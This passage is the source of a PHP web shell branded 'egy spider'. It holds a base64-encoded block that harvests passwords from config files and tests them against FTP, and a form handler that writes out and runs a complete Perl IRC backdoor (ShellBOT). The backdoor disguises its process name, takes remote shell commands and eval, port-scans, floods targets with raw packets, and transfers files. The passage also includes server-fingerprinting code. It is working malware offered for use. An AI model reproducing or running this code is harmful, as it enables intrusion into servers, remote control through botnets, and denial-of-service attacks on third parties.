CB9IA0KICAgICAgICAgICAgICAgIH0gDQogICAgICAgICAgICAgfSANCiAgICAgICB9IA0KICAgfSANCn0gDQoNCmZ1bmN0aW9uIGdldF9wYXNzKCRsaW5rKSB7IA0KICAgQCRjb25maWc9Zm9wZW4oJGxpbmssJ3InKTsgDQogICB3aGlsZSghZmVvZigkY29uZmlnKSkgeyANCiAgICAgICAkbGluZT1mZ2V0cygkY29uZmlnKTsgDQogICAgICAgaWYgKHN0cnN0cigkbGluZSwncGFzcycpIG9yIHN0cnN0cigkbGluZSwncGFzc3dvcmQnKSBvciBzdHJzdHIoJGxpbmUsJ3Bhc3N3ZCcpKSB7IA0KICAgICAgICAgICBpZiAoc3RycnBvcygkbGluZSwnIicpKSANCiAgICAgICAgICAgICAgJHBhc3M9c3Vic3RyKCRsaW5lLChzdHJwb3MoJGxpbmUsJz0nKSszKSwoc3RycnBvcygkbGluZSwnIicpLShzdHJwb3MoJGxpbmUsJz0nKSszKSkpOyANCiAgICAgICAgICAgZWxzZSANCiAgICAgICAgICAgICAgJHBhc3M9c3Vic3RyKCRsaW5lLChzdHJwb3MoJGxpbmUsJz0nKSszKSwoc3RycnBvcygkbGluZSwiJyIpLShzdHJwb3MoJGxpbmUsJz0nKSszKSkpOyANCiAgICAgICAgICAgcmV0dXJuICRwYXNzOyANCiAgICAgICB9IA0KICAgfSANCn0gDQoNCmZ1bmN0aW9uIGZ0cF9jaGVjaygkbG9naW4sJHBhc3MpIHsgDQogICAgQCRmdHA9ZnRwX2Nvbm5lY3QoJzEyNy4wLjAuMScpOyANCiAgICBpZiAoJGZ0cCkgeyANCiAgICAgICBAJHJlcz1mdHBfbG9naW4oJGZ0cCwkbG9naW4sJHBhc3MpOyANCiAgICAgICBpZiAoJHJlcykgeyANCiAgICAgICAgICBlY2hvICdbRlRQXSAnLiRsb2dpbi4nOicuJHBhc3MuIiAgU3VjY2Vzc1xuIjsgDQogICAgICAgfSANCiAgICAgICBlbHNlIGZ0cF9xdWl0KCRmdHApOyANCiAgICB9IA0KfSANCg0KZWNobyAiPC90ZXh0YXJlYT48YnI+IjsgDQoNCmVjaG8gIjwvYm9keT48L2h0bWw+IjsgDQo/Pg="; + + +if(!empty($_POST['ircadmin']) AND !empty($_POST['ircserver']) AND !empty($_POST['ircchanal']) AND !empty($_POST['ircname'])) +{ +$ircadmin=$_POST['ircadmin']; +$ircserver=$_POST['ircserver']; +$ircchan=$_POST['ircchanal']; +$irclabel=$_POST['ircname']; +echo "<title>OverclockiX Shell-Connector || Connecting to $ircserver<title>"; +echo "<body bgcolor=\"black\" text=\"green\">"; +echo "Now Connecting to <b><font color=\"red\">$ircserver</font></b> in <b><font color=\"yellow\">$ircchan</font></b> Andministrators: <b><font color=\"yellow\">$ircadmin</font></b> Botname is <b><font color=\"yellow\">$irclabel</font></b>"; +echo "<p>Dont Forget to Delete Loader.pl in /tmp</p>"; +####################################################### +######################IRC Trojan########################## +$file=" +################ CONFIGURACAO ################################################################# +my \$processo = '/usr/local/apache/bin/httpd -DSSL'; # Nome do processo que vai aparece no ps # +#----------------------------------------------################################################ +my \$linas_max='48'; # Evita o flood :) depois de X linhas # +#----------------------------------------------################################################ +my \$sleep='4'; # ele dorme X segundos # +##################### IRC ##################################################################### +my @adms=(\"$ircadmin\"); # Nick do administrador # +#----------------------------------------------################################################ +my @canais=(\"$ircchan\"); # Caso haja senha (\"#canal :senha\") # +#----------------------------------------------################################################ +my \$nick='$irclabel'; # Nick do bot. Caso esteja em uso vai aparecer # + # aparecer com numero radonamico no final # +#----------------------------------------------################################################ +my \$ircname = 'Linux'; # User ID # +#----------------------------------------------################################################ +chop (my \$realname = `uname -a`); # Full Name # +#----------------------------------------------################################################ +\$servidor='$ircserver' unless \$servidor; # Servidor de irc que vai ser usado # + # caso n?o seja especificado no argumento # +#----------------------------------------------################################################ +my \$porta='6667'; # Porta do servidor de irc # +################ ACESSO A SHELL ############################################################### +my \$secv = 1; # 1/0 pra habilita/desabilita acesso a shell # +############################################################################################### +my \$VERSAO = '0.2'; +\$SIG{'INT'} = 'IGNORE'; +\$SIG{'HUP'} = 'IGNORE'; +\$SIG{'TERM'} = 'IGNORE'; +\$SIG{'CHLD'} = 'IGNORE'; +\$SIG{'PS'} = 'IGNORE'; +\$SIG{'STOP'} = 'IGNORE'; +use IO::Socket; +use Socket; +use IO::Select; +chdir(\"/\"); +\$servidor=\"\$ARGV[0]\" if \$ARGV[0]; +$0=\"\$processo\".\"\0\"x16;; +my \$pid=fork; +exit if \$pid; +die \"Problema com o fork: $!\" unless defined(\$pid); +my \$dcc_sel = new IO::Select->new(); +############################# +# B0tchZ na veia ehehe :P # +############################# + +\$sel_cliente = IO::Select->new(); +sub sendraw { + if ($#_ == '1') { + my \$socket = \$_[0]; + print \$socket \"\$_[1]\\n\"; + } else { + print \$IRC_cur_socket \"\$_[0]\\n\"; + } +} +################################# +sub conectar { + my \$meunick = \$_[0]; + my \$servidor_con = \$_[1]; + my \$porta_con = \$_[2]; + + my \$IRC_socket = IO::Socket::INET->new(Proto=>\"tcp\", PeerAddr=>\"\$servidor_con\", PeerPort=>\$porta_con) or return(1); + if (defined(\$IRC_socket)) { + \$IRC_cur_socket = \$IRC_socket; + + \$IRC_socket->autoflush(1); + \$sel_cliente->add(\$IRC_socket); + + \$irc_servers{\$IRC_cur_socket}{'host'} = \"\$servidor_con\"; + \$irc_servers{\$IRC_cur_socket}{'porta'} = \"\$porta_con\"; + \$irc_servers{\$IRC_cur_socket}{'nick'} = \$meunick; + \$irc_servers{\$IRC_cur_socket}{'meuip'} = \$IRC_socket->sockhost; + nick(\"\$meunick\"); + sendraw(\"USER \$ircname \".\$IRC_socket->sockhost.\" \$servidor_con :\$realname\"); + sleep 1; + } +} ##################### + +my \$line_temp; +while( 1 ) { + while (!(keys(%irc_servers))) { conectar(\"\$nick\", \"\$servidor\", \"\$porta\"); } + delete(\$irc_servers{''}) if (defined(\$irc_servers{''})); + &DCC::connections; + my @ready = \$sel_cliente->can_read(0); + next unless(@ready); + foreach \$fh (@ready) { + \$IRC_cur_socket = \$fh; + \$meunick = \$irc_servers{\$IRC_cur_socket}{'nick'}; + \$nread = sysread(\$fh, \$msg, 4096); + if (\$nread == 0) { + \$sel_cliente->remove(\$fh); + \$fh->close; + delete(\$irc_servers{\$fh}); + } + @lines = split (/\\n/, \$msg); + + for(my \$c=0; \$c<= $#lines; \$c++) { + \$line = \$lines[\$c]; + \$line=\$line_temp.\$line if (\$line_temp); + \$line_temp=''; + \$line =~ s/\\r$//; + unless (\$c == $#lines) { + parse(\"\$line\"); + } else { + if ($#lines == 0) { + parse(\"\$line\"); + } elsif (\$lines[\$c] =~ /\\r$/) { + parse(\"\$line\"); + } elsif (\$line =~ /^(\S+) NOTICE AUTH :\*\*\*/) { + parse(\"\$line\"); + } else { + \$line_temp = \$line; + } + } + } + } +} + +######################### + + +sub parse { + my \$servarg = shift; + if (\$servarg =~ /^PING \:(.*)/) { + sendraw(\"PONG :$1\"); + } elsif (\$servarg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) { + my \$pn=$1; my \$onde = $4; my \$args = $5; + if (\$args =~ /^\\001VERSION\\001$/) { + notice(\"\$pn\", \"\\001VERSION ShellBOT-\$VERSAO por 0ldW0lf\\001\"); + } + if (grep {\$_ =~ /^\Q\$pn\E$/i } @adms) { + if (\$onde eq \"\$meunick\"){ + shell(\"\$pn\", \"\$args\"); + } + if (\$args =~ /^(\Q\$meunick\E|\!atrix)\s+(.*)/ ) { + my \$natrix = $1; + my \$arg = $2; + if (\$arg =~ /^\!(.*)/) { + ircase(\"\$pn\",\"\$onde\",\"\$1\") unless (\$natrix eq \"!atrix\" and \$arg =~ /^\!nick/); + } elsif (\$arg =~ /^\@(.*)/) { + \$ondep = \$onde; + \$ondep = \$pn if \$onde eq \$meunick; + bfunc(\"\$ondep\",\"$1\"); + } else { + shell(\"\$onde\", \"\$arg\"); + } + } + } + } elsif (\$servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) { + if (lc($1) eq lc(\$meunick)) { + \$meunick=$4; + \$irc_servers{\$IRC_cur_socket}{'nick'} = \$meunick; + } + } elsif (\$servarg =~ m/^\:(.+?)\s+433/i) { + nick(\"\$meunick\".int rand(9999)); + } elsif (\$servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) { + \$meunick = $2; + \$irc_servers{\$IRC_cur_socket}{'nick'} = \$meunick; + \$irc_servers{\$IRC_cur_socket}{'nome'} = \"$1\"; + foreach my \$canal (@canais) { + sendraw(\"JOIN \$canal\"); + } + } +} +########################## + +sub bfunc { + my \$printl = \$_[0]; + my \$funcarg = \$_[1]; + if (my \$pid = fork) { + waitpid(\$pid, 0); + } else { + if (fork) { + exit; + } else { + if (\$funcarg =~ /^portscan (.*)/) { + my \$hostip=\"$1\"; + my @portas=(\"21\",\"22\",\"23\",\"25\",\"53\",\"80\",\"110\",\"143\"); + my (@aberta, %porta_banner); + foreach my \$porta (@portas) { + my \$scansock = IO::Socket::INET->new(PeerAddr => \$hostip, PeerPort => \$porta, Proto => 'tcp', Timeout => 4); + if (\$scansock) { + push (@aberta, \$porta); + \$scansock->close; + } + } + + if (@aberta) { + sendraw(\$IRC_cur_socket, \"PRIVMSG \$printl :portas abertas: @aberta\"); + } else { + sendraw(\$IRC_cur_socket,\"PRIVMSG \$printl :Nenhuma porta aberta foi encontrada\"); + } + } + if (\$funcarg =~ /^pacota\s+(.*)\s+(\d+)\s+(\d+)/) { + my (\$dtime, %pacotes) = attacker(\"$1\", \"$2\", \"$3\"); + \$dtime = 1 if \$dtime == 0; + my %bytes; + \$bytes{igmp} = $2 * \$pacotes{igmp}; + \$bytes{icmp} = $2 * \$pacotes{icmp}; + \$bytes{o} = $2 * \$pacotes{o}; + \$bytes{udp} = $2 * \$pacotes{udp}; + \$bytes{tcp} = $2 * \$pacotes{tcp}; + + sendraw(\$IRC_cur_socket, \"PRIVMSG \$printl :\\002 - Status GERAL -\\002\"); + sendraw(\$IRC_cur_socket, \"PRIVMSG \$printl :\\002Tempo\\002: \$dtime\".\"s\"); + sendraw(\$IRC_cur_socket, \"PRIVMSG \$printl :\\002Total pacotes\\002: \".(\$pacotes{udp} + \$pacotes{igmp} + \$pacotes{icmp} + \$pacotes{o})); + sendraw(\$IRC_cur_socket, \"PRIVMSG \$printl :\\002Total bytes\\002: \".(\$bytes{icmp} + \$bytes {igmp} + \$bytes{udp} + \$bytes{o})); + sendraw(\$IRC_cur_socket, \"PRIVMSG \$printl :\\002Media de envio\\002: \".int(((\$bytes{icmp}+\$bytes{igmp}+\$bytes{udp} + \$bytes{o})/1024)/\$dtime).\" kbps\"); + + } + exit; + } + } +} +########################## + + +sub ircase { + my (\$kem, \$printl, \$case) = @_; + + + if (\$case =~ /^join (.*)/) { + j(\"$1\"); + } + if (\$case =~ /^part (.*)/) { + p(\"$1\"); + } + if (\$case =~ /^rejoin\s+(.*)/) { + my \$chan = $1; + if (\$chan =~ /^(\d+) (.*)/) { + for (my \$ca = 1; \$ca <= $1; \$ca++ ) { + p(\"$2\"); + j(\"$2\"); + } + } else { + p(\"\$chan\"); + j(\"\$chan\"); + } + } + if (\$case =~ /^op/) { + op(\"\$printl\", \"\$kem\") if \$case eq \"op\"; + my \$oarg = substr(\$case, 3); + op(\"$1\", \"$2\") if (\$oarg =~ /(\S+)\s+(\S+)/); + } + if (\$case =~ /^deop/) { + deop(\"\$printl\", \"\$kem\") if \$case eq \"deop\"; + my \$oarg = substr(\$case, 5); + deop(\"$1\", \"$2\") if (\$oarg =~ /(\S+)\s+(\S+)/); + } + if (\$case =~ /^voice/) { + voice(\"\$printl\", \"\$kem\") if \$case eq \"voice\"; + \$oarg = substr(\$case, 6); + voice(\"$1\", \"$2\") if (\$oarg =~ /(\S+)\s+(\S+)/); + } + if (\$case =~ /^devoice/) { + devoice(\"\$printl\", \"\$kem\") if \$case eq \"devoice\"; + \$oarg = substr(\$case, 8); + devoice(\"$1\", \"$2\") if (\$oarg =~ /(\S+)\s+(\S+)/); + } + if (\$case =~ /^msg\s+(\S+) (.*)/) { + msg(\"$1\", \"$2\"); + } + if (\$case =~ /^flood\s+(\d+)\s+(\S+) (.*)/) { + for (my \$cf = 1; \$cf <= $1; \$cf++) { + msg(\"$2\", \"$3\"); + } + } + if (\$case =~ /^ctcp\s+(\S+) (.*)/) { + ctcp(\"$1\", \"$2\"); + } + if (\$case =~ /^ctcpflood\s+(\d+)\s+(\S+) (.*)/) { + for (my \$cf = 1; \$cf <= $1; \$cf++) { + ctcp(\"$2\", \"$3\"); + } + } + if (\$case =~ /^invite\s+(\S+) (.*)/) { + invite(\"$1\", \"$2\"); + } + if (\$case =~ /^nick (.*)/) { + nick(\"$1\"); + } + if (\$case =~ /^conecta\s+(\S+)\s+(\S+)/) { + conectar(\"$2\", \"$1\", 6667); + } + if (\$case =~ /^send\s+(\S+)\s+(\S+)/) { + DCC::SEND(\"$1\", \"$2\"); + } + if (\$case =~ /^raw (.*)/) { + sendraw(\"$1\"); + } + if (\$case =~ /^eval (.*)/) { + eval \"$1\"; + } +} +########################## + +sub shell { + return unless \$secv; + my \$printl=\$_[0]; + my \$comando=\$_[1]; + if (\$comando =~ /cd (.*)/) { + chdir(\"$1\") || msg(\"\$printl\", \"Dossier Makayench :D \"); + return; + } + elsif (\$pid = fork) { + waitpid(\$pid, 0); + } else { + if (fork) { + exit; + } else { + my @resp=`\$comando 2>&1 3>&1`; + my \$c=0; + foreach my \$linha (@resp) { + \$c++; + chop \$linha; + sendraw(\$IRC_cur_socket, \"PRIVMSG \$printl :\$linha\"); + if (\$c == \"\$linas_max\") { + \$c=0; + sleep \$sleep; + } + } + exit; + } + } +} + +#eu fiz um pacotadorzinhu e talz.. dai colokemo ele aki +sub attacker { + my \$iaddr = inet_aton(\$_[0]); + my \$msg = 'B' x \$_[1]; + my \$ftime = \$_[2]; + my \$cp = 0; + my (%pacotes); + \$pacotes{icmp} = \$pacotes{igmp} = \$pacotes{udp} = \$pacotes{o} = \$pacotes{tcp} = 0; + + socket(SOCK1, PF_INET, SOCK_RAW, 2) or \$cp++; + socket(SOCK2, PF_INET, SOCK_DGRAM, 17) or \$cp++; + socket(SOCK3, PF_INET, SOCK_RAW, 1) or \$cp++; + socket(SOCK4, PF_INET, SOCK_RAW, 6) or \$cp++; + return(undef) if \$cp == 4; + my \$itime = time; + my (\$cur_time); + while ( 1 ) { + for (my \$porta = 1; \$porta <= 65535; \$porta++) { + \$cur_time = time - \$itime; + last if \$cur_time >= \$ftime; + send(SOCK1, \$msg, 0, sockaddr_in(\$porta, \$iaddr)) and \$pacotes{igmp}++; + send(SOCK2, \$msg, 0, sockaddr_in(\$porta, \$iaddr)) and \$pacotes{udp}++; + send(SOCK3, \$msg, 0, sockaddr_in(\$porta, \$iaddr)) and \$pacotes{icmp}++; + send(SOCK4, \$msg, 0, sockaddr_in(\$porta, \$iaddr)) and \$pacotes{tcp}++; + + # DoS ?? :P + for (my \$pc = 3; \$pc <= 255;\$pc++) { + next if \$pc == 6; + \$cur_time = time - \$itime; + last if \$cur_time >= \$ftime; + socket(SOCK5, PF_INET, SOCK_RAW, \$pc) or next; + send(SOCK5, \$msg, 0, sockaddr_in(\$porta, \$iaddr)) and \$pacotes{o}++;; + } + } + last if \$cur_time >= \$ftime; + } + return(\$cur_time, %pacotes); +} + +############# +# ALIASES # +############# + +sub action { + return unless $#_ == 1; + sendraw(\"PRIVMSG \$_[0] :\\001ACTION \$_[1]\\001\"); +} + +sub ctcp { + return unless $#_ == 1; + sendraw(\"PRIVMSG \$_[0] :\\001\$_[1]\\001\"); +} +sub msg { + return unless $#_ == 1; + sendraw(\"PRIVMSG \$_[0] :\$_[1]\"); +} + +sub notice { + return unless $#_ == 1; + sendraw(\"NOTICE \$_[0] :\$_[1]\"); +} + +sub op { + return unless $#_ == 1; + sendraw(\"MODE \$_[0] +o \$_[1]\"); +} +sub deop { + return unless $#_ == 1; + sendraw(\"MODE \$_[0] -o \$_[1]\"); +} +sub hop { + return unless $#_ == 1; + sendraw(\"MODE \$_[0] +h \$_[1]\"); +} +sub dehop { + return unless $#_ == 1; + sendraw(\"MODE \$_[0] +h \$_[1]\"); +} +sub voice { + return unless $#_ == 1; + sendraw(\"MODE \$_[0] +v \$_[1]\"); +} +sub devoice { + return unless $#_ == 1; + sendraw(\"MODE \$_[0] -v \$_[1]\"); +} +sub ban { + return unless $#_ == 1; + sendraw(\"MODE \$_[0] +b \$_[1]\"); +} +sub unban { + return unless $#_ == 1; + sendraw(\"MODE \$_[0] -b \$_[1]\"); +} +sub kick { + return unless $#_ == 1; + sendraw(\"KICK \$_[0] \$_[1] :\$_[2]\"); +} + +sub modo { + return unless $#_ == 0; + sendraw(\"MODE \$_[0] \$_[1]\"); +} +sub mode { modo(@_); } + +sub j { &join(@_); } +sub join { + return unless $#_ == 0; + sendraw(\"JOIN \$_[0]\"); +} +sub p { part(@_); } +sub part {sendraw(\"PART \$_[0]\");} + +sub nick { + return unless $#_ == 0; + sendraw(\"NICK \$_[0]\"); +} + +sub invite { + return unless $#_ == 1; + sendraw(\"INVITE \$_[1] \$_[0]\"); +} +sub topico { + return unless $#_ == 1; + sendraw(\"TOPIC \$_[0] \$_[1]\"); +} +sub topic { topico(@_); } + +sub whois { + return unless $#_ == 0; + sendraw(\"WHOIS \$_[0]\"); +} +sub who { + return unless $#_ == 0; + sendraw(\"WHO \$_[0]\"); +} +sub names { + return unless $#_ == 0; + sendraw(\"NAMES \$_[0]\"); +} +sub away { + sendraw(\"AWAY \$_[0]\"); +} +sub back { away(); } +sub quit { + sendraw(\"QUIT :\$_[0]\"); +} + +# DCC +######################### + +package DCC; + +sub connections { + my @ready = \$dcc_sel->can_read(1); +# return unless (@ready); + foreach my \$fh (@ready) { + my \$dcctipo = \$DCC{\$fh}{tipo}; + my \$arquivo = \$DCC{\$fh}{arquivo}; + my \$bytes = \$DCC{\$fh}{bytes}; + my \$cur_byte = \$DCC{\$fh}{curbyte}; + my \$nick = \$DCC{\$fh}{nick}; + + + my \$msg; + my \$nread = sysread(\$fh, \$msg, 10240); + + if (\$nread == 0 and \$dcctipo =~ /^(get|sendcon)$/) { + \$DCC{\$fh}{status} = \"Cancelado\"; + \$DCC{\$fh}{ftime} = time; + \$dcc_sel->remove(\$fh); + \$fh->close; + next; + } + + if (\$dcctipo eq \"get\") { + \$DCC{\$fh}{curbyte} += length(\$msg); + + my \$cur_byte = \$DCC{\$fh}{curbyte}; + + open(FILE, \">> \$arquivo\"); + print FILE \"\$msg\" if (\$cur_byte <= \$bytes); + close(FILE); + + my \$packbyte = pack(\"N\", \$cur_byte); + print \$fh \"\$packbyte\"; + + + if (\$bytes == \$cur_byte) { + \$dcc_sel->remove(\$fh); + \$fh->close; + \$DCC{\$fh}{status} = \"Recebido\"; + \$DCC{\$fh}{ftime} = time; + next; + } + } elsif (\$dcctipo eq \"send\") { + my \$send = \$fh->accept; + \$send->autoflush(1); + \$dcc_sel->add(\$send); + \$dcc_sel->remove(\$fh); + \$DCC{\$send}{tipo} = 'sendcon'; + \$DCC{\$send}{itime} = time; + \$DCC{\$send}{nick} = \$nick; + \$DCC{\$send}{bytes} = \$bytes; + \$DCC{\$send}{curbyte} = 0; + \$DCC{\$send}{arquivo} = \$arquivo; + \$DCC{\$send}{ip} = \$send->peerhost; + \$DCC{\$send}{porta} = \$send->peerport; + \$DCC{\$send}{status} = \"Enviando\"; + #de cara manda os primeiro 1024 bytes do arkivo.. o resto fik com o sendcon + open(FILE, \"< \$arquivo\"); + my \$fbytes; + read(FILE, \$fbytes, 1024); + print \$send \"\$fbytes\"; + close FILE; +# delete(\$DCC{\$fh}); +} elsif (\$dcctipo eq 'sendcon') { + my \$bytes_sended = unpack(\"N\", \$msg); + \$DCC{\$fh}{curbyte} = \$bytes_sended; + if (\$bytes_sended == \$bytes) { + \$fh->close; + \$dcc_sel->remove(\$fh); + \$DCC{\$fh}{status} = \"Enviado\"; + \$DCC{\$fh}{ftime} = time; + next; + } + open(SENDFILE, \"< \$arquivo\"); + seek(SENDFILE, \$bytes_sended, 0); + my \$send_bytes; + read(SENDFILE, \$send_bytes, 1024); + print \$fh \"\$send_bytes\"; + close(SENDFILE); + } + } +} +########################## + +sub SEND { + my (\$nick, \$arquivo) = @_; + unless (-r \"\$arquivo\") { + return(0); + } + + my \$dccark = \$arquivo; + \$dccark =~ s/[.*\/](\S+)/$1/; + + my \$meuip = $::irc_servers{\"$::IRC_cur_socket\"}{'meuip'}; + my \$longip = unpack(\"N\",inet_aton(\$meuip)); + + my @filestat = stat(\$arquivo); + my \$size_total=\$filestat[7]; + if (\$size_total == 0) { + return(0); + } + + my (\$porta, \$sendsock); + do { + \$porta = int rand(64511); + \$porta += 1024; + \$sendsock = IO::Socket::INET->new(Listen=>1, LocalPort =>\$porta, Proto => 'tcp') and \$dcc_sel->add(\$sendsock); + } until \$sendsock; + + \$DCC{\$sendsock}{tipo} = 'send'; + \$DCC{\$sendsock}{nick} = \$nick; + \$DCC{\$sendsock}{bytes} = \$size_total; + \$DCC{\$sendsock}{arquivo} = \$arquivo; + + &::ctcp(\"\$nick\", \"DCC SEND \$dccark \$longip \$porta \$size_total\"); + +} + +sub GET { + my (\$arquivo, \$dcclongip, \$dccporta, \$bytes, \$nick) = @_; + return(0) if (-e \"\$arquivo\"); + if (open(FILE, \"> \$arquivo\")) { + close FILE; + } else { + return(0); + } + + my \$dccip=fixaddr(\$dcclongip); + return(0) if (\$dccporta < 1024 or not defined \$dccip or \$bytes < 1); + my \$dccsock = IO::Socket::INET->new(Proto=>\"tcp\", PeerAddr=>\$dccip, PeerPort=>\$dccporta, Timeout=>15) or return (0); + \$dccsock->autoflush(1); + \$dcc_sel->add(\$dccsock); + \$DCC{\$dccsock}{tipo} = 'get'; + \$DCC{\$dccsock}{itime} = time; + \$DCC{\$dccsock}{nick} = \$nick; + \$DCC{\$dccsock}{bytes} = \$bytes; + \$DCC{\$dccsock}{curbyte} = 0; + \$DCC{\$dccsock}{arquivo} = \$arquivo; + \$DCC{\$dccsock}{ip} = \$dccip; + \$DCC{\$dccsock}{porta} = \$dccporta; + \$DCC{\$dccsock}{status} = \"Recebendo\"; +} +############################ +# po fico xato de organiza o status.. dai fiz ele retorna o status de acordo com o socket.. dai o ADM.pl lista os sockets e faz as perguntas +sub Status { + my \$socket = shift; + my \$sock_tipo = \$DCC{\$socket}{tipo}; + unless (lc(\$sock_tipo) eq \"chat\") { + my \$nick = \$DCC{\$socket}{nick}; + my \$arquivo = \$DCC{\$socket}{arquivo}; + my \$itime = \$DCC{\$socket}{itime}; + my \$ftime = time; + my \$status = \$DCC{\$socket}{status}; + \$ftime = \$DCC{\$socket}{ftime} if defined(\$DCC{\$socket}{ftime}); + + my \$d_time = \$ftime-\$itime; + + my \$cur_byte = \$DCC{\$socket}{curbyte}; + my \$bytes_total = \$DCC{\$socket}{bytes}; + + my \$rate = 0; + \$rate = (\$cur_byte/1024)/\$d_time if \$cur_byte > 0; + my \$porcen = (\$cur_byte*100)/\$bytes_total; + + my (\$r_duv, \$p_duv); + if (\$rate =~ /^(\d+)\.(\d)(\d)(\d)/) { + \$r_duv = $3; \$r_duv++ if $4 >= 5; + \$rate = \"$1\.$2\".\"\$r_duv\"; + } + if (\$porcen =~ /^(\d+)\.(\d)(\d)(\d)/) { + \$p_duv = $3; \$p_duv++ if $4 >= 5; + \$porcen = \"$1\.$2\".\"\$p_duv\"; + } + return(\"\$sock_tipo\",\"\$status\",\"\$nick\",\"\$arquivo\",\"\$bytes_total\", \"\$cur_byte\",\"\$d_time\", \"\$rate\", \"\$porcen\"); + } + + return(0); +} + +# esse 'sub fixaddr' daki foi pego do NET::IRC::DCC identico soh copiei e coloei (colokar nome do autor) +sub fixaddr { + my (\$address) = @_; + + chomp \$address; # just in case, sigh. + if (\$address =~ /^\d+$/) { + return inet_ntoa(pack \"N\", \$address); + } elsif (\$address =~ /^[12]?\d{1,2}\.[12]?\d{1,2}\.[12]?\d{1,2}\.[12]?\d{1,2}$/) { + return \$address; + } elsif (\$address =~ tr/a-zA-Z//) { # Whee! Obfuscation! + return inet_ntoa(((gethostbyname(\$address))[4])[0]); + } else { + return; + } +} +############################ +"; +$bot = "/tmp/ircs.pl"; +$open = fopen($bot,"w"); +fputs($open,$file); +fclose($open); +$cmd="perl $bot"; +$cmd2="rm $bot"; +system($cmd); +system($cmd2); +$_POST['cmd']="echo \"Now script try connect to ircserver ...\""; + +} + + +if(!isset($_COOKIE[$lang[$language.'_text137']])) { + $ust_u=''; + if($unix && !$safe_mode){ + foreach ($userful as $item) { + if(which($item)){$ust_u.=$item;} + } + } + if (@function_exists('apache_get_modules') && @in_array('mod_perl',apache_get_modules())) {$ust_u.=", mod_perl";} + if (@function_exists('apache_get_modules') && @in_array('mod_include',apache_get_modules())) {$ust_u.=", mod_include(SSI)";} + if (@function_exists('pcntl_exec')) {$ust_u.=", pcntl_exec";} + if (@extension_loaded('win32std')) {$ust_u.=", win32std_loaded";} + if (@extension_loaded('win32service')) {$ust_u.=", win32service_loaded";} + if (@extension_loaded('ffi')) {$ust_u.=", ffi_loaded";} + if (@extension_loaded('perl')) {$ust_u.=", perl_loaded";} + if(substr($ust_u,0,1)==",") {$ust_u[0]="";} + + $ust_u = trim($ust_u); +}else { + $ust_u = trim($_COOKIE[$lang[$language.'_text137']]); +} + +if(!isset($_COOKIE[$lang[$language.'_text138']])) { + $ust_d=''; + if($unix && !$safe_mode){ + foreach ($danger as $item) { + if(which($item)){$ust_d.=$item;} + } + } + if(!$safe_mode){ + foreach ($danger as $item) { + if(ps($item)){$ust_d.=$item;} + } + } + if (@function_exists('apache_get_modules') && @in_array('mod_security',apache_get_modules())) {$ust_d.=", mod_security";} + if(substr($ust_d,0,1)==",") {$ust_d[0]="";} + + $ust_d = trim($ust_d); +}else { + $ust_d = trim($_COOKIE[$lang[$language.'_text138']]); +} + +if(!isset($_COOKIE[$lang[$language.'_text142']])) { + + $select_downloaders='<select size="1" name=with>'; + if((!@function_exists('ini_get')) || (@ini_get('allow_url_fopen') && @function_exists('file'))){$select_downloaders .= "<option value=\"fopen\">fopen</option>";$downloader="fopen";} + if($unix && !$safe_mode){ + foreach ($downloaders as $item) { + if(which($item)){$select_downloaders .= '<option value="'.$item.'">'.$item.'</option>';$downloader.=", $item";} + } + } + $select_downloaders .= '</select>'; + if(substr($downloader,0,1)==",") {$downloader[0]="";} + + $downloader=trim($downloader); + +} + + +echo $head; +echo '</head>'; + +echo '<<body><table width=100% cellpadding=0 cellspacing=0 bgcolor=#dadada><tr><td bgcolor=#000000 width=120><font face=Comic Sans MS size=1>'.ws(2).'<DIV dir=ltr align=center><p><font style="font-weight: 500" face="Webdings" color="#800000" size="7">!</font></p>'.ws(2).'<DIV dir=ltr align=center><SPAN +style="FILTER: blur(add=1,direction=10,strength=25); HEIGHT: 25px"> +<SPAN +style="FONT-SIZE: 15pt; COLOR: white; FONT-FAMILY: Impact">egy spider</P></SPAN></DIV></font></b></font></td><td bgcolor=#000000><font face=tahoma size=1>'. + +'</center></font>'.$fe.'</td>'.'<td bgcolor=#333333><font face=#FFFFFF size=-2>'; +echo ws(2)."<b>".date ("d-m-Y H:i:s")."</b> Your IP: [<font color=blue>".gethostbyname($_SERVER["REMOTE_ADDR"])."</font>]"; +echo " X_FORWARDED_FOR:"; if(isset($_SERVER['HTTP_X_FORWARDED_FOR'])){echo "[<font color=red>".$_SERVER['HTTP_X_FORWARDED_FOR']."</font>]";}else{echo "[<font color=green><b>NONE</b></font>]";} +echo " CLIENT_IP: ";if(isset($_SERVER['HTTP_CLIENT_IP'])){echo "[<font color=red>".$_SERVER['HTTP_CLIENT_IP']."</font>]";}else{echo "[<font color=green><b>NONE</b></font>]";} +echo " Server IP: [<font color=blue>".gethostbyname($_SERVER["HTTP_HOST"])."</font>]"; + +echo "<br>"; + +echo ws(2)."PHP Version: <b>".@phpversion()."</b>"; +$curl_on = @function_exists('curl_version'); +echo ws(2); +echo "cURL: <b>".(($curl_on)?("<font color=red>ON</font>"):("<font color=green>OFF</font>")); +echo "</b>".ws(2); +echo "MySQL: <b>"; +$mysql_on = @function_exists('mysql_connect'); +if($mysql_on){ +echo "<font color=red>ON</font>"; } else { echo "<font color=green>OFF</font>"; } +echo "</b>".ws(2); +echo "MSSQL: <b>"; +$mssql_on = @function_exists('mssql_connect'); +if($mssql_on){echo "<font color=red>ON</font>";}else{echo "<font color=green>OFF</font>";} +echo "</b>".ws(2); +echo "PostgreSQL: <b>"; +$pg_on = @function_exists('pg_connect'); +if($pg_on){echo "<font color=red>ON</font>";}else{echo "<font color=green>OFF</font>";} +echo "</b>".ws(2); +echo "Oracle: <b>"; +$ora_on = @function_exists('ocilogon'); +if($ora_on){echo "<font color=red>ON</font>";}else{echo "<font color=green>OFF</font>";} +echo "</b>".ws(2); +echo "MySQLi: <b>"; +$mysqli_on = @function_exists('mysqli_connect'); +if($mysqli_on){echo "<font color=red>ON</font>";}else{echo "<font color=green>OFF</font>";} +echo "</b>".ws(2); +echo "MSQL: <b>"; +$msql_on = @function_exists('msql_connect'); +if($msql_on){echo "<font color=red>ON</font>";}else{echo "<font color=green>OFF</font>";} +echo "</b>".ws(2); +echo "SQLite: <b>"; +$sqlite_on = @function_exists('sqlite_open'); +if($sqlite_on){echo "<font color=red>ON</font>";}else{echo "<font color=green>OFF</font>";} +echo "</b><br>".ws(2); + +echo "Safe_Mode: <b>"; +echo (($safe_mode)?("<font color=red>ON</font>"):("<font color=green>OFF</font>")); +echo 